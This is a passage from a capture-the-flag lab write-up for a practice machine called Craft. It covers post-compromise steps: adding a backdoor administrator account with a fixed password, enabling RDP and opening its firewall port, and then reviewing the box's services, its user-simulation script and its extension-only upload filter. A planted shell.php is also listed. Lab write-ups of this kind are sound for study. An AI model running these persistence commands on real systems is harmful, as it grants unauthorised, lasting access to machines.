Beyond

This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM after compromising the target system.

C:\Windows\system32> net users /ADD adm1n qwer1234 && net localgroup administrators /ADD adm1n
The command completed successfully.
The command completed successfully.
 
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && netsh firewall add portopening TCP 3389 "Remote Desktop"
 
The operation completed successfully.
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft]
└─$ xfreerdp /u:adm1n /p:'qwer1234' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0

RDP

Services

PS C:\Windows\system32> sc.exe qc ApacheHTTPServer
[SC] QueryServiceConfig SUCCESS
 
SERVICE_NAME: ApacheHTTPServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Xampp\apache\bin\httpd.exe" -k runservice
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Apache HTTP Server
        DEPENDENCIES       : Tcpip
                           : Afd
        SERVICE_START_NAME : .\apache

"C:\Xampp\apache\bin\httpd.exe" -k runservice

PS C:\Windows\system32> sc.exe qc ResumeService1
[SC] QueryServiceConfig SUCCESS
 
SERVICE_NAME: ResumeService1
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\nssm-2.24\win64\nssm.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ResumeService1
        DEPENDENCIES       :
        SERVICE_START_NAME : .\thecybergeek

C:\Program Files\nssm-2.24\win64\nssm.exe

NSSM

PS C:\Program Files\nssm-2.24\win64> .\nssm.exe edit ResumeService1

C:\Users\thecybergeek\Documents\resume.ps1

`C:\Users\thecybergeek\Documents\resume.ps1`

PS C:\Program Files\nssm-2.24\win64> cat C:\Users\thecybergeek\Documents\resume.ps1
$resume = "C:\Users\thecybergeek\Documents\Resumes"
 
while($true) {
        # Moving Resumes
        move C:\xampp\htdocs\uploads\* $resume
        cmd /c 'icacls "C:\Users\thecybergeek\Documents\Resumes" /grant thecybergeek:(OI)(CI)F /T'
 
        # Avoiding Crash
        Remove-Item -Recurse -Force -Path C:\Users\thecybergeek\AppData\Roaming\LibreOffice\4\*
        Copy-Item -Path "C:\Users\thecybergeek\Documents\user" -Destination "C:\Users\thecybergeek\AppData\Roaming\LibreOffice\4\user" -Recurse
        cmd /c 'icacls "C:\Users\thecybergeek\AppData\Roaming\LibreOffice\4\user" /grant thecybergeek:(OI)(CI)F /T'
 
        Start-Sleep -s 5
 
        $files = ls $resume\*.odt
        if ( $files.length -gt 0) {
                # launch odt files
                Invoke-Item "C:\Users\thecybergeek\Documents\Resumes\*.odt"
                Start-Sleep -s 60
 
                # Killing Libre Office Instances
                Stop-Process -Name soffice* -Force
                Start-Sleep -s 15
        }
 
        Remove-Item -Recurse -force -Path $resume\*
 
        # Avoiding Crash
        Remove-Item -Recurse -Force -Path C:\Users\thecybergeek\AppData\Roaming\LibreOffice\4\*
        Copy-Item -Path "C:\Users\thecybergeek\Documents\user" -Destination "C:\Users\thecybergeek\AppData\Roaming\LibreOffice\4\user" -Recurse
        cmd /c 'icacls "C:\Users\thecybergeek\AppData\Roaming\LibreOffice\4\user" /grant thecybergeek:(OI)(CI)F /T'
 
        Start-Sleep -s 5
}

Producing user behavior to open ODT file with LibreOffice

Web

PS C:\xampp\htdocs> dir
 
 
    Directory: C:\xampp\htdocs
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/13/2021   3:18 AM                assets
d-----        7/13/2021   3:18 AM                css
d-----        7/13/2021   3:18 AM                js
d-----         4/8/2025  11:04 AM                uploads
-a----         7/7/2021  10:53 AM           9635 index.php
-a----         4/8/2025  12:03 PM           9296 shell.php
-a----         4/8/2025  12:00 PM             20 test.txt
-a----         7/7/2021   9:56 AM            835 upload.php
 
 
PS C:\xampp\htdocs> cat .\upload.php
<?php
 
        //Check if the file is well uploaded
        if($_FILES['file']['error'] > 0) { echo 'Error during uploading, try again'; }
 
 
        //Set up valid extension
        $extsAllowed = array( 'odt' );
 
        $extUpload = strtolower( substr( strrchr($_FILES['file']['name'], '.') ,1) ) ;
 
        //Check if the uploaded file extension is allowed
 
        if (in_array($extUpload, $extsAllowed) ) {
 
        //Upload the file on the server
 
        $name = "uploads/{$_FILES['file']['name']}";
        $result = move_uploaded_file($_FILES['file']['tmp_name'], $name);
 
        if($result){echo "You're resume was submitted , it will be reviewed shortly by our staff";}
 
        } else { echo 'File is not valid. Please submit ODT file'; }
 
        // Giving HR permission on the resume file
        exec('cmd /c "icacls C:\xampp\htdocs\uploads /grant thecybergeek:(OI)(CI)F /T"');
?>

Checking the source code of the upload.php file reveals the extension filter mechanism

InfoSec LAB

Explorer

Craft_Beyond

Beyond

Services

NSSM

`C:\Users\thecybergeek\Documents\resume.ps1`

Web

Interactive Graph View

Table of Contents

Backlinks